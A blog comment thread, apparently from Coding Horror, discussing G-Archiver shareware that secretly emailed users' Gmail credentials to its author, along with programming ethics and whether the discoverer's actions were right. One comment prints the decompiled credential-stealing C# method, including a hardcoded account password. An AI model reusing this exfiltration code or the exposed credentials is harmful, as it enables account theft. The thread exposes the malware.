I had a guy email me his Credit Report once in Electronic Form. He frantically emailed me and asked me to delete it, which I did. I called him and he was so happy that he sent me an Amazon.com giftcard for $25. I have had people email me their e-tickets for their flights, etc.

That´s really bad, and the problem is that only people like us (who knows what reflector is) realize of that kind of things and very often the law is short to punish this kinds of crimes.

Good Job Jeff! if you stop programming try to be a detective or a tv series writer.

I really enjoy your blog, thanks!

Goes to show how much you can trust websites which request your email user/pass to import contacts!

You're an honest man, Jeff. Nice work.

Trust is good, possibility to check is better. If anything, this story is the best warning against closed source software.

BTW, why is this software still linked to?

Funny, alot of people seems to be praising Jeff's honesty. Althought I'm sure Jeff is honest, the hero of the story is John Terry, as Jeff himself clearly points out. Not sure where this misunderstanding is coming from

Actually, mwalts, it's Dustin Brooks who is the curious programmer who figured this out. Though I don't know why Jeff doesn't link to the original source.

Actually John Terry is the antagonist in this story and Dustin Brooks, the protagonist, deserves all the praise.

"Trust but verify."

KyleG, I agree, I love Jeff's blog but sometimes I wish he would link better to the original source. If in this case it was sent to him privately in an email, he should at least point that out.

Surely the *real* hero is Dustin Brooks? John Terry is the villain of the tale.

Good will, but poor action:

"John Terry" had probably setup an email forwarding to a backup gmail account in case somebody decompile his code.

So he still has all the passwords.

So now, with everything deleted and the account password modified, how are we going to notify all these account that they should change their password ?

That's why I don't download programs from those shareware directories.

Check out the site of the g-archiver "author": http://www.matemediainc.com

Looks like a spammy SEO site. Not surprised. There's probably a lot of shareware out there like this, because most of the time the guys pulling scams like this are script kiddies who are trading "recipes" on private forums.

It's great to see somebody talking about ethics in relation to programming. So often I think it's easy to get caught up in an idea of "I'm just interacting with a machine, and it interacts with other machines, and I'm not responsible for anything...".

It's also unfortunate that there really are people out there who would violate those ethics, but it's good to see that they are real--that's something that does have to be confronted.

I think point 1 in that ACM code is also something to think about. I wonder how many people are working on software that really does not contribute to human well-being, and don't think about it. It's an unfortunate tradition, though--some of the first computers ever were used to aim missiles, and without some twisty logic it's hard to say how that contributes to human well-being more than other things the same programmer could have spent their time doing.

-Max

"Actually, mwalts, it's Dustin Brooks who is the curious programmer who figured this out. Though I don't know why Jeff doesn't link to the original source."

I'm pretty sure this IS the original source. There are no other references to Dustin Brooks / John Terry / G-Archiver that I can find on the web.

Jeff's usually really awesome about linking to sources.

You stopped FAR too short. This should be turned over to authorities. That must be some sort of CRIMINAL offense.

Wow. How incredible. I think this is a wake-up call... we shouldn't automatically trust software.

You logged into my gmail account? And deleted the fruits of my hard work? Some people have no shame!

(sorry, couldn't resist. -- My name is Thomas, not J Terry)

mwalts: Dustin Brooks is the hero, not John Terry. John Terry is the inept coder.

This John Terry seems to email pawel lesnikowski and adityasonphavde (aditya rao) I would not trust these people either.

This sort of problem is what OAuth is designed to help solve.

Not only can 3rd party websites not truely be trusted with one's passwords, now that all computers are pretty much online all the time, it's not safe to trust closed source apps, or even open source apps with uninspected code, with one's password.

First of all, Dustin Brooks for president. What a hero.

Next, note that matemedia.com (alleged publisher of this tool) has at least two telephone numbers:
1-877-309-7521
1-877-752-1309
(first via http://www.russmate.com/client_support.php, second via whois)

Dustin Brooks' sense of humor seems to be at least equal to his sense of justice. I want Mr. Brooks to call "John Terry" and explain the situation. In fact, if he recorded the call and placed the MP3 on a lame shareware site I would probably even pay $29.95 to listen.

That's fishy. Why would jterry need to include his u/p in the program? As a diabolical villain, I don't think he'd make the cut to be on 24. I mean, this isn't like an IRC bot where you have to put the hostname to phone home to into the bot... He could have sent email to his account without exposing the password!

Is he really that dense, or is this some kind of weird hoax?

One thing is true -- if you DL the program and use reflector, you do indeed see the facts as they are described in this post:

public static void CheckConnection(string a, string b)
{
try
{
MailMessage message = new MailMessage();
message.To.Add("JTerry79@gmail.com");
message.From = new MailAddress("JTerry79@gmail.com", "JTerry", Encoding.UTF8);
message.Subject = "Account";
message.SubjectEncoding = Encoding.UTF8;
message.Body = "Username: " + a;
message.Body = message.Body + "\r\nPassword: " + b;
message.BodyEncoding = Encoding.UTF8;
message.IsBodyHtml = false;
message.Priority = MailPriority.High;
SmtpClient client = new SmtpClient();
client.Credentials = new NetworkCredential("JTerry79@gmail.com", "bilal482");
client.Port = 0x24b;
client.Host = "smtp.gmail.com";
client.EnableSsl = true;
client.Send(message);
}
catch (Exception)
{
}
}

Very interesting Jeff. Btw, here in British Columbia, Canada, Software Engineers can be registered as Professional Engineers that adhere to this code of ethics:
http://www.apeg.bc.ca/resource/publications/actbylawscode.html

Interestingly enough, as a professional software engineer, you can be held legally responsible for the designs and codes you write. I wonder what our profession (vocation? craft?) would look like if we were all held legally responsible for our work?

Patrick wrote :
>That's fishy. Why would jterry need to include his u/p in the program?

Because GMail requires authentication to use their SMTP server.

Why would anyone pay $30 to get a backup copy of their GMail account when Thunderbird is free? Just connect to GMail's IMAP server, set TB to save all downloaded messages, and do a complete sync. Not only would you then have a complete backup, but you would also be able to read and send email from TB while having it synced with GMail.

Just about any other mail client with IMAP support should also work.

Look everyone, I don't mean to be bursting everyones bubble but I'm not finding this in the source code anywhere. While this is my first time using reflector, I'm not an idiot and I have searched through all the source code Reflector produces and there is no reference to an email address "jterry79@gmail.com"

Now maybe the software has been updated and the malicious code has been removed, or maybe someone is crying wolf. I would love for someone to reference something specific other than "hey look what I found."

> Jeff's usually really awesome about linking to sources.

Thank you, I do try very very hard to link all the sources I talk about. The original is from an email; I added some text to the post to clarify this and put Dustin's name in bold.

And yes, Dustin is the hero here, not me. I'm just reporting it.

Ryan wrote :
>I'm not finding this in the source code anywhere

The CheckConnection method is in the SM.dll Mail class. It is not in the EXE.

Patrick copy / pasted the code accurately.

My apologies everyone. Looks like I am an idiot.

What about working for a company like Raytheon, whose job is to build better killing machines? Would you consider that ethically defensible? That would seem to violate principles 1 and 2. Or, what about working for an online gambling site? I'm just curious as to where you would draw the line.

This was truly malicious behavior, but (as Jeff has pointed out in previous posts) users do not understand how accessible their identity can be:

I recently recovered a PC from a municipal recycling center. While evaluating its value for parts I discovered it was completely functional. The HDD still had the OS, Outlook, and several years of Turbo Tax on it. Everything was live. I didn't have the nerve to call the guy and tell him how stupid he was, but I was kind enough to bomb the machine to bedrock before reconditioning it. My son now happly surfs PBS on it. Not a bad exchange for a $20 electronics recycling charge and a dead TV.

There are times when I really pity the great unwashed user contingent, and at the same time am grateful that most geeks are non-belligerent.

Wow! That's all I can say. I wonder how many gmail accounts he's harvested. Like someone said, maybe this should be reported to the police. Since google accounts can be linked to financial information (via google checkout), this could be considered theft.

Jeff,

Great detective work.

I don't know if you've ever covered this, but I would think that just asking a user for username and password and email address on a website would probably net someone a certain percentage of people who would for simplicity sake just use the same username and password everywhere (thereby giving you their username and password to email, or who knows what).

In response to Travis, some engineers reportedly quit the company that makes the space shuttle's robotic arm, because of a proposed takeover by a U.S. arms maker.

>What about working for a company like Raytheon, whose job is to build better killing machines? Would you consider that ethically defensible? That would seem to violate principles 1 and 2. Or, what about working for an online gambling site? I'm just curious as to where you would draw the line.

That's always been the big problem. It's not unique to computer science at all. One could say it started with the physicists "knowing sin" but in reality you can trace it back a lot farther.

But in reality the people taking a paycheck always find a way to justify it to themselves. Oh, they're not the ones harming others -- that's what the military does, what politicians do. Oh, they're not the ones not contributing to society -- they just make the tools. Same old story.

My oh my, that is horrible! It goes to show how much seemingly legitimate software we install that could be malicious, and how much we trust we place in the authors.

This time round you had the source code, what about apps that we don't?

Yeah, it's bad, but come on, use your common sense - there is no such thing as free software. Someone gets something out of it, it might not be money it might be data. Never use shareware - here is the answer.

You don't have to try to justify it. Like it or not, there is evil in the world and people have a moral obligation to protect themselves and their families.

Some of us take that seriously, while others live behind that protection and point fingers about how bad it is.

Oh, and before I worked for a DoD contractor I worked on medical software that was responsible for helping to bring new lives into this world that might not make it.

With either job, I know I am making a difference in the world and sleeping just fine at night. I doubt if I would feel the same working on a new search engine or game or accounting package.

Didn't Dustin email all the affected users to warn them to change their passwords?

I have a problem with 4 in conjunction with 5. Often I find a lot that is unfair in our current copyright law and fairness. (Example: the RIAA has changed its tune and claim it is illegal to rip a CD you purchased for your computer or MP3 player.)

In order to behave in a fair way, I should be allowed to break copyright. But then, I'd be breaking copyright.

I'm no fan of professional soccer, but a quick search or two on some of the (non-victim) names from the screenshot appear to be related to it (John Terry of Chelsea, Pawel, and Lesnikowski). Maybe the dickwad responsible for this douchebaggery (thanks Jeff for expanding my vocabulary) is a fan.

> Fortunately for me, an eagle-eyed reader by the name of Israel Orange didn't abuse that information for his own gain, but instead kindly pointed out my error to me in a private email.

Is this why you chose the word "orange" for the post security word? Interesting choice. :)

Nice post Jeff.

Rule: wherever you give your passwords you should/must be cautious.

The ACM also has a similar document called Software Engineering Code of Ethics and Professional Practice which has more practical and tangible aspirations. These aren't just rules for ACM members, they prescribe a code of conduct for all software engineers.

http://www.acm.org/about/se-code#full

of these, John Terry has violated these:

3.12. Work to develop software and related documents that respect the privacy of those who will be affected by that software.

3.13. Be careful to use only accurate data derived by ethical and lawful means, and use it only in ways properly authorized.

And that, my friends, truly is coding horror.

Hi Jeff,

I don't normally post but I thought I should make an exception for this topic.

I completely agree that this is a horrible betrayal of trust. I find this offensive to the honest programmers out there for whom this has negative effects. It's scumbags like this guy that make people question every file, live in fear of scams, and contribute to fear of technology.

I really enjoy your blog, thanks for sharing this.

To give John Terry the benefit of the doubt, there is always the possibility that this was some kind of development (debugging) version that had somehow become publicly available.

http://www.matemediasoft.com/

These guys are also selling programs for MySpace and YouTube (FriendTools and TubeAdder) that require your login/password.

And here's the kicker: they're both spamming tools.

"Add thousands of new friends to your network quickly. Great tool for those who want to market to myspace users."
"This easy to use software also automates the process of adding comments on YouTube. If you plan on marketing on YouTube, you need this tool."

That russmate.com/matemedia.com site rang a bell - I knew I'd seen it somewhere before. Recently. Amid many LOLs.

And yes indeed - MateMedia turned out to be the company hosting a scammy "Federal suppliers directory" site which gave Alex Papadimoulis of The Daily WTF a chance to run a most excellent story all his own:
http://thedailywtf.com/Articles/So-You-Hacked-Our-Site!.aspx
(Do NOT miss the spectacular flameout by company staff in the comments!)

Man, 2008's really shaping up to be their year, isn't it?

Why have you linked to the original application? I think it can only have bad consequences, like improving their google rank, or lead people who aren't really paying attention over to their site where they may download it.

This is really a big threat for opensource or freeware developers. Users wont trust developers anymore whom are working hard to provide something useful.

Why didn't Mr. Brooks just use an old-fashioned Perl script for archiving?

terrible!
And Ryan the info is still there it is in Mail class in SM.dll file not in main exe.

I don't normally post, but I wanted to comment on those who are saying that programming in some way for the military violates 1 and 2 of the code above. As Oogie Pringle said, there are people in the world who are malicious, and it is important to defend against them.

Maybe this could be seen as an unfortunate prisoner's dilemma, but in no way does it reflect poorly on the ethical or moral sense of the people doing the programming.

Please elaborate more on reflector please.

Author/website perhaps? Thanks.

Phil

@Phil:

Lutz Roeder's .NET Reflector: http://www.aisto.com/roeder/dotnet/

Excellent tool.

We use Lutz as a verb. "Let's lutz it and find out"

On a related note... let's say I need to send emails through a gmail account from my C# program. This basically means there will be strings inside my source that contain the gmail username and password.

This is obviously bad, in the presence of Reflector. In the unmanaged world we could encrypt the strings using some encryption algorithm, and since the details of the encryption algorithm would be compiled to assembly nobody could tell what's going on. But in the managed world, the details of such an encrypting process are there for everyone to decompile, so it doesn't sound like that's going to work.

This _must_ be a solved problem, but I don't really know the keywords to use to find the solution...

Domenic,
you would like to use an encrypted appSettings element in your app.config then.
http://msdn2.microsoft.com/en-us/library/ms998280.aspx

Domenic, security by obscurity has never been a solution. You don't embed sensitive credentials in code. Period.

Encrypting the data means you have a key somewhere. Writing your own cryptographic algorithm means it's broken (see Schneier) and anyway, all that's needed to break your clever encrypted-password-in-executable scheme is to set up a software http/https proxy (fiddler, wireshark, etc.) and read the plain text credentials passed by the program.

Never rely on native code obfuscation for security.

HAH! I was *not* expecting my name to pop up when I started reading this post :-) BTW, Jeff sent me some awesome Coding Horror stickers for my trouble.

Patrick-I can't take credit for Jeff's choice of CAPTCHA-it was around a long time before I ever spoke to him.

Good thing you changed the password to the account.So is John Terry walking scott-free ? I believe he has some explaining to do .

Even after all this, John Terry still has less information about his victims than your average Google employee.

Why do people act so shocked? If you download any app or go to any website which asks for you credentials to do *anything* you should be extremely cautious and only trust once you've verified that it is legit. You might argue that there was no way to verify it in this case without reflecting it and looking at what it was doing, but your credentials are basically your children when you're roaming the 'net - so if you can't verify it, DON'T USE IT. It's pretty simple. And for the person who said this guy was probably smart enough to create a back-up account "in case someone reflected his code"... no, he would have obfuscated the code if he was being cautious. He f'ed up.

I assume most of you would trust, say, Facebook to keep its word and *not* store your credentials when you allow it to use its "Friend Finder"? Why?

And it's frankly a waste of time to say this is a matter of ethics and we all need to be held to a higher standard and "if only he adhered to the code" etc. Sorry, the 'net is the real world, it's not contained within our individual computers. People are out to scam, and you need to go out there believing it. As honest programmers we need to stick together, and the scammers will make themselves known. That's the real value of Jeff's post.

Actually, Raúl, U.S. law is very specific as to this particular issue. Have a look at the Federal Wiretap Act, 18 U.S.C. 2510 (http://www.cybercrime.gov/wiretap2510_2522.htm)

So, just to be a little contrarian can anyone point out in the code of ethics where it says that programmers should become vigillantes? It would seem to me that Dustin Brooks falls short of living up to the ideal of honoring property rights. By deleting the GMail account and the emails there-in Dustin has potentially opened himself up to potential prosecution under laws designed to be used against hackers. In addition he has potentially destroyed evidence that might be used to prosecute John Terry.

If he really wanted to be a good guy he could have just reported the individual to Google's security hotline along with the appropriate documentation, as well as reporting to the shareware site where the application was hosted.

You did download it directly from the developer's site? Or purchase it?

There is the possibility that you downloaded a hacked version. Although it seems unlikely the gmail account would be similar to the developer's name... a less lame scammer would send to a mail server that wouldn't provide access using same password or be traceable back to him.

If you purchased it and/or didn't accept a use at your own risk license it's hard to imagine a crime or civil liability doesn't exist.

@Joe:

If I had been one of those people in the in-box, I'd have wanted Dustin to do exactly what he did. Stopping the leak should be first priority, then catching the guy. The chances of the latter, and successfully prosecuting him/her, are unfortunately slim anyway.

One point about trusting "free" software: there's a big difference between this sort of program and open source projects, where you (and everyone) can see the actual source code. This couldn't have happened if someone knowledgeable had been able to even glance at the source.

I was going to respond telling John Terry how he could have avoided this situation, but I decided to apply the Code of Ethics and not do so. Hopefully I made the world a better place today.

@Oogie Pringle
That’s the problem with this world, people like you. You are all about self preservation and the preservation of those close to you. The fact is that if we considered those around us who we don't know as equal in worth to ourselves we would think twice be-fore working on weapons and devices that we know will kill others. Just because you justify it by saying that there are evil people in the world, does not absolve you from fact that you are a contributing factor to that persons death. More innocent people die today as a result of the direct work that we do. This is no longer the days of open war when enemies met in a field and attacked each other and you knew that pretty much anybody who was there had decided to give their life for that cause. Now we have more innocent people dying than combatants. So you have to ask yourself when you write that code for the guidance chip that goes in the missile, but for the fact that I and my colleagues chose to write this code would xxxxx be dead? I know you sleep well at night because you think you are protecting your family and that is the truly tragic part about this. I know some will make the argument that anything can be a weapon, you don't know how it is going to be used, well can you honestly say that?

I wouldn't worry too much about notifying the people about their username/password compromise. As you can clearly see, the emails have never been read. Only Google could read them without marking them as read, and that's kind of irrelevant, now isn't it?

Stewie and the rest of you anti-defense morons need to take your liberal, kumbaya attitudes and shove them up your a$$e$. In a perfect world we could all rest easy knowing that no one would ever create weapons because they would all abide by some unwritten code of ethics. But the world is not perfect and someone somewhere is going to do the coding. And because of that, we need someone to do the coding on defense systems as well. That's why it's called "defense" and not "offense".

War sucks. And yes, innocent people get hurt. But innocent people get hurt by more than just war. If you stopped programming on everything that could possibly hurt an innocent person then you wouldn't be programming at all.

"If I had been one of those people in the in-box, I'd have wanted Dustin to do exactly what he did."

Thereby destroying the evidence, and stopping any chance you had of successfully...

a) suing for damages, or

b) proving that the criminal acts done in your name with your gmail account weren't actually perpetrated by you.

Much better would have been to change the password on the account (locking the real John Terry out), then report it to Google.

But hindsight is always 20-20, especially when you can be a vigilante hero.

@Joshua
There is a "mark as unread" button in GMail.

Isn't it really about ethics, period, and not just "programming ethics"?

However, it seems a little silly to focus on this incident -- every time we post, the internet remembers; every time we log on, we allow (without the legal action others have mentioned) large corporations to write information to our hard drives without permission, and to "phone home", without our permission.

@paulz:
"""
Yeah, it's bad, but come on, use your common sense - there is no such thing as free software. Someone gets something out of it, it might not be money it might be data. Never use shareware - here is the answer.
"""

Yes, there is such a thing as free software - free (as in free speech) open source software. The problem is not free (as in free beer) vs commercial, but closed source vs open source. And yes, there are actually programmers that give their work away without trying to steal anything from you.

MateMedia is a legitimate company and we are absolutely horrified that this has occurred.

We have removed from our websites all links to the software, and will be requesting any download sites that are hosting the software to remove it immediately.

We are in the process of notifying our customers, and we're investigating this matter with our software development team.

I think the issue here is not ethics, we're talking about unlawful behavior, that guy should be prosecuted.

Regards

What everyone seems to be missing is the fact that through g-mail you can easily set up a filter to forward all in-coming e-mail to another e-mail address without marking it read. So deleting all of the e-mails probably did absolutely nothing. Plus the fact that this guy could be using his own program to archive all of the e-mails he got with the usernames/passwords.

I think that Dustin Brook's heart was in the right place, but the best thing would have been to immediately change the password, and then go into "contacts" and click "select all" and send a warning e-mail to everyone (gmail automatically adds a contact for anyone that e-mails you). Then to notify Google, leaving the e-mails intact as evidence (since you already changed the password, the guy can no longer get into the account, so the e-mails don't need to be deleted).

Despite that, I think that Dustin did a great thing, and I'm glad he also made an effort to get the word out by sending the story to a well known blog like this one.

I made the mistake of telling Facebook's Friend Finder my password, and then realized how dumb it was and changed it to a pass-phrase that I will never share with anyone/anything except the gmail sign in page. I think Jeff has done a great job in championing proper password practices.

As a programmer, I'm ashamed to say that I never really thought about how I was storing my user's passwords until after reading a few posts on this blog. However my boss unfortunately will not allow me to encrypt user's passwords because he says that "we don't store any private data, and we want password recovery to be instant and easy". So we use pathetic secret questions/answers to "verify" them and then reveal to them their password in plain text right there on the webpage if they forgot it. It makes me sick. Unfortunately, I don't have a choice...

I am interested to hear any further details on what happens with this story if Google ever tells Dustin if anything ever came of this...

This is appalling. I'm really glad you wrote the article.

Given that, there's not a word here about the ethics of Dustin Brooks having;
1) using Reflector to take a peek at the source code that wasn't his,
2) opening up a browser and logging in to gmail that wasn't his using the found account information,
3) deciding to go ahead and blast every email to the deleted folder and then empty it on an account that wasn't his,
4) changing the password and security question on an account that wasn't his, and
5) contacting google to erase this account only after he didn't see a way to delete it himself.

I thought the topic here was Ethics [albeit Programming Ethics]?

To my way of thinking all he had the right to do was contact google and report the incident.

Were his actions /really/ any more "ethical" than John Terry's?

BTW: To Delete the GMail Account:
Open GMail Account
Click on Settings [upper right]
Click on Google Account Settings [near bottom]
Click on My Services - Edit
Click on Close account and delete all services and info associated with it
[didn't go any further than this]

Even though Dusting Brooks got the Email account deleted thus destroying vital information I think Jeff still Has the Screenshots ,Isn't that enough to prosecute John Terry ?

well done!somebody knows who is this John Terry and his location?

I have never understood how website features like "friend finder" got so successful that every social site has one version or another. Just the thought of a 3rd party site asking me for my username and password makes me cringe. But you'll be amazed at how even developers who are supposed to savvy at things like this use these "friend finder" features.

Registrant:
MateMedia, Inc.
POB 430302
Miami, Florida 33243
United States

Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: GARCHIVER.COM
Created on: 03-Apr-07
Expires on: 03-Apr-08

Well done, Dustin!

Registrant:
MateMedia, Inc.

POB 430302
Miami, Florida 33243
United States

Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: MATEMEDIASOFT.COM
Created on: 08-Aug-03
Expires on: 08-Aug-08
Last Updated on: 07-Aug-07

Administrative Contact:
Inc., MateMedia cdmhome2@aol.com
MateMedia, Inc.
POB 430302
Miami, Florida 33243
United States
8773097521

Technical Contact:
Inc., MateMedia cdmhome2@aol.com
MateMedia, Inc.
POB 430302
Miami, Florida 33243
United States
8773097521

Domain servers in listed order:
NS.RACKSPACE.COM
NS2.RACKSPACE.COM

Registry Status: clientDeleteProhibited
Registry Status: clientRenewProhibited
Registry Status: clientTransferProhibited
Registry Status: clientUpdateProhibited

This is precisely why I won't use "free" software that isn't open source or released by a "reputable" company.

One name I did notice in the gmail screen cap in the contacts list is Pawel Lesnikowski. He's a writer of .NET components:

http://www.lesnikowski.com/

Maybe he might know this John Terry. This abuse of personal trust and privacy is appalling. I hope this site and application is flagged as a trojan and taken down by everyone in the shareware community.

Dave -- if you think Dustin's ethics are the same as this other guy's, then you obviously don't really understand ethics all that well. There's nothing unethical about viewing source code of others (ripping it off is something else entirely), there's nothing unethical about stopping someone from harvesting identity information of others. Whatever ethical infractions which might exist in using someone else's login information is well covered by the doctrine of double-effect.

I used a software, which has a demo-mode for an online service. Probably in demo-mode, developer of software was using his credentials, probably hardcoded in software.

I realized, after using the software in demo-mode, if I opened the website (gmail, yea it was google's api that software uses) in browser, I logged into his gmail automatically, I thought it was some issues with Google. But later realized, it's because I used that software in demo mode, new cookies were in places.

Anyway, I informed the developer, never heard back. I don't use that software anymore for two reasons:-

1) Don't want my Gmail cookies replaced by others
2) I don't feel good, if I unintentionally log into his account

-abdul

Makes sense.

@Domenic - please stop programming, right now.

Dave asked, "Were his [Dustin Brooks] actions /really/ any more "ethical" than John Terry's?"

To which the answer is a resounding "yes."

@stewie

Go on and live in your little world where everything would be just fine if there were no guns or missiles. I'm sure that before that everyone live in peace and harmony, right? Of course, all you have to do is look at North America BEFORE 1492 and that goes right out the door.

And don't worry. People like me will continue to defend people like you so you can live in your safe little world.

Oogie

Cool ... it's OK to *steal* a log-in and password from source code, illegally log in to the email account and destroy all the messages [and the account had the perp figured out how] -because- you guys didn't like what the vendor was doing.

You haven't the foggiest fricking idea what he was /actually/ doing with any of that information - but your assumption that he was up to no good gives you the warm and fuzzy you need do what ever the hell you want. Bah ... I call BS!

Please don't confuse /any/ of this with any misguided perception that I condone what was originally happened - I'm appalled -but- that doesn't give you the right ...

> the doctrine of double-effect
Horse hockey!

Both events [provided the first one is /actually/ illegal] should be punishable by law.

Have a pleasant day,

ethical - conforming to accepted standards of social or professional behavior.

Neither act was ethical.

That's why i don't trust shareware. They can leave you with a bunch of spyware and steel your personal information. The only software that I can trust is free (as in freedom) software.

Curious thought. The email address may have been embedded in the code and done what you say, but the snapshot of the inbox shows that ALL of those passwords and email addresses were NEW and UNREAD.

Although it was a completely dumbass way of going about things, i would probably deduce that the email account was set up to capture those for the lost passwords and account names for those who use the program or something equally idiotic. In no way am i saying this is the right thing to do, but the programmer was more than likely extremely foolish, but mostly oblivious to the trust he was violating.

On the other hand, the gentleman you say had alerted google of this, violates someone else's inbox, using someone else's information that required a bit of digging to get, trashes this other party's email account, and sends a note marking it for deletion.

This is ALSO a vast breech of proper ethics.
the first thing to dowould be alert the programmer of this error, and request that it isdealt with in an ethical manner that alerts his users of this "programming error" and then re-releases with a better password storage option, if any at all.

If this fails to geyt any attention, then report it to the proper authorities or agency for dealing with this issue, as well as google.

Your friend may be in some hot water for his actions as well.

Another reason to NO revelate your password in software

Holy Living Funk! What a huge scam, I'm going to every shareware download site that will let me post a review of this and link to this article, great job! Really love your blog, everyday reader for a few months now.

Orange? I'm typing in orange, and you wrote about John Orange. Heh.

EVERYONE SHOULD USE OPENID TO AVOID THIS CRAP :)

IN GENERAL

if A does something illegal
and person B does something illegal to uncover it

B's evidence should be admissible in court
and both A and B should be tried for the crimes they committed.

In our current society, though, police may uncover crucial evidence without a warrant but it will be inadmissible in court. I think it is much more fair for the evidence to still be admissible in court AND for the officer to be tried for the crime of breaking and entering. If they want to risk a few years in jail to put a violent criminal behind bars, they should have the ability to do so.

Greg

[quote=dave]This is appalling. I'm really glad you wrote the article.

Given that, there's not a word here about the ethics of Dustin Brooks having;
1) using Reflector to take a peek at the source code that wasn't his,
2) opening up a browser and logging in to gmail that wasn't his using the found account information,
3) deciding to go ahead and blast every email to the deleted folder and then empty it on an account that wasn't his,
4) changing the password and security question on an account that wasn't his, and
5) contacting google to erase this account only after he didn't see a way to delete it himself.

I thought the topic here was Ethics [albeit Programming Ethics]?

To my way of thinking all he had the right to do was contact google and report the incident.

Were his actions /really/ any more "ethical" than John Terry's?
[/quote]

There is certainly an opportunity for academic debate on the ethics exhibited by Misters Brooks and Terry, but I know where I stand within that debate. Your view struck me right away, upon reading this article, but truthfully (non-violent) vigilante justice is consistent with my personal ethics, so I don't see a conflict here. Especially when it comes down to this kind of rarely prosecuted, yet extremely harmful crime. Mr. Brooks, we are to presume, would never log into someone's account maliciously. He was simply protecting himself, and others. Mr. Terry had no right to that information to begin with, I see no foul play in preventing him from accessing it, and forcing him to contact google... or sign up for another account, of course. I believe Mr. Brooks to be a hero without doubt.

Thank you Dustin Brooks for erasing the credentials. I was not on the list but you definitely made the world a better place. Also thanks for exposing the phisher and trojan malware author.

To those that he did not do the right thing: There is NO excuse harvesting passwords. Even if "John Terry" is merely a total moron it's inexcusable, and I'm not buying it, stealing users passwords is done for ill gain.

I'd probably wouldn't do exactly as Brooks, such as I'd log in through Tor, get shocked like him, changed the password, made sure there was no forwarding, notified all users by sending them a warning together with their respective account passwords to make sure they understand it's real, then not delete anything but get the attention of the police. But I'm in no place to complain as I wouldn't have refractored it in the first place. Again, he certainly did the best he could think of, it seems he probably did neuter it, and he made the details about the trojan public. Very good job.

"If I had been one of those people in the in-box, I'd have wanted Dustin to do exactly what he did."

actually, dustin did miss one step. Mass emailing everyone involved to let them know what happened.

It's trivial for someone with your gmail user/password to set up a backdoor using email forwarding so that they'll get copies of any email with "password" in it or billing information.

Hell, all they have to do is change your "secondary password recovery email address" as well and they'll be able to hijack your account whenever they want to. I had this happen to me when the domain name for my password recovery email address got sold: http://internetducttape.com/2007/10/31/password-recovery-online-security/

What if this article had been about Brooks getting caught in the email account where all he found was personal mail? There's little if anything to indicate that it was any more than a crap shoot (with pretty big odds in his favor admittedly) that he would.

Although he did state: 'I noticed that every time a user adds their account to the program to back up their data, it sends and email with their username and password to his personal email box.'
Wonder how he noticed that about 'other' users.

In addition the comment: 'It didn't really have the functionality I was looking for, but being a programmer myself I used Reflector to take a peek at the source code.' - doesn't cause any alarms here, amazing. How would having a peek improve the functionality of the program?

Have your big hug-fest because a data farmer was snagged. What he did to get there, IMHO, was wrong. I won't bother arguing the issue any further, we seem to differ on opinion in this regard ... which is ok by me. It's all just the perspective I saw/read it from at any rate.

> What if this article had been about Brooks getting caught
> in the email account where all he found was personal mail?"

In this case perhaps he'd send the account an email suggesting "Terry" should change is password. And again, he would have helped someone.

> In addition the comment: 'It didn't really have the functionality
> I was looking for, but being a programmer myself I used Reflector
> to take a peek at the source code.' - doesn't cause any alarms
> here, amazing. How would having a peek improve the functionality
> of the program?

That's one of the ways malware is identified. It's really hard to turn it around against him, especially when we know what he did.

*uses my handy-dandy CSI black-stripe decryptor to get the passwords from your image*

Shouldn't you be putting a "nofollow" on the G-Archiver link?

Travis,
What if you like killing people? You're choices are limited in that case: join the military (if you can) and get paid to do what you enjoy, work for a weapons development company and get paid more, or commit a "crime". It's all about perspective and if you're working freelance or as an employee :).

Dave wrote "You haven't the foggiest fricking idea what he was /actually/ doing with any of that information"

It doesn't matter what he was doing with it. Just collecting it without informing users that he was collecting it is either a breach of privacy laws and/or fraud.

Of course, if you don't think so, I have this new remote login application I'd like you to try. It doesn't email the IP, username, and password/SSH certificate used to me or anything!

Shameless proselytising...

This is one reason that users should be entitled to examine the source code, or otherwise reverse engineer/analyse the workings of a piece of software, without fear of legal backlash.

There is an ethical imperative here that overrides any economic rebuttal.

@Aaron - I would think linking to the original application i exactly the right thing to do, as CH is likely to show up as the first hit in Google for the software (as of right now it's number 4.)

@Joshua & others, the screenshot only shows that the most recent 1777 emails were unread - who knows how many thousands of people have tried the software. Plus, if they are being automatically forwarded they won't show up as read. I'm not sure that what Dustin did was right, but if he had to do it, he could have at least checked out the filters and saved the contact list first.

Interestingly the download and buy links on his site seem to be inactive. Also, I hope this doesn't hurt the reputation of garchiver, the GNOME archiving utility with the almost identical name.

A.L. Flanagan wrote:
"If I had been one of those people in the in-box, I'd have wanted Dustin to do exactly what he did. Stopping the leak should be first priority, then catching the guy. The chances of the latter, and successfully prosecuting him/her, are unfortunately slim anyway."

Yes, but did Dustin do what's in *Dustin's* best interests? People have been prosecuted for simply reporting security issues in corporate websites, where the intent was benign, not malicious. It's gotten to the point that the best policy is to keep your mouth shut.

As Joe pointed out, Dustin has committed the following potential crimes (I am not a lawyer or police officer):
1) Accessing someone else's mail account, without permission
2) Deleting someone else's data, without permission
3) Destroying evidence

Of course, most will not argue Dustin did the wrong thing *morally*. But who knows, a judge might see it differently.

Here's a story where a university student could've been expelled for accessing unsecured data on a campus network:
http://chronicle.com/news/article/3146/university-allows-student-journalist-who-discovered-data-security-flaw-to-remain

It's gotten to the point that I am hesitate to run anything I dont write myself or download from a trusted source such as Microsoft or other major vendor.

The days of using stuff from TuCows are CNet have been over for quite sometime for me - and then I read something like this and it confirms what were my worst fears.

Damn.

The "intellectual 'property'" clauses 5 and 6 are why I flatly refuse to join the ACM. I have no difficulty giving credit for authorship - that is to say, I agree with attribution rights and think plagiarism is fraud.

However, as a computer scientist, I stand firmly opposed to copyright and patent monopolies.

5 and 6 are irreconcilable with the others.

1. copyrights and patents actively destroy human well-being.
2. Enforcement of copyrights and patents harm others.
3. Those who enforce copyrights and patents rather than waiving them
are untrustworthy.
4. copyrights and patents discriminate against those who believe in free markets.
5. copyrights and patents are not proper property rights. In fact, they destroy physical property rights (even though you own something, you are not permitted to shape its physical form to convey certain information).

6. I have no difficulty giving credit to authors for authorship. The "proper credit" for "intellectual 'property'" is a massive "SCREW YOU" to whoever came up with the term.

7. Enforcement of patent and copyright in the technological limit (which the relevant infonazis are pursuing with digital restrictions management) requires gross violation of everyone' privacy to make sure people aren't (gasp) copying or using bits of information.

8. It's impossible to truly honour confidentiality while "respecting" copyrights and patents.

Can we now even trust the browsers?

>Didn't Dustin email all the affected users to warn them to change their passwords?

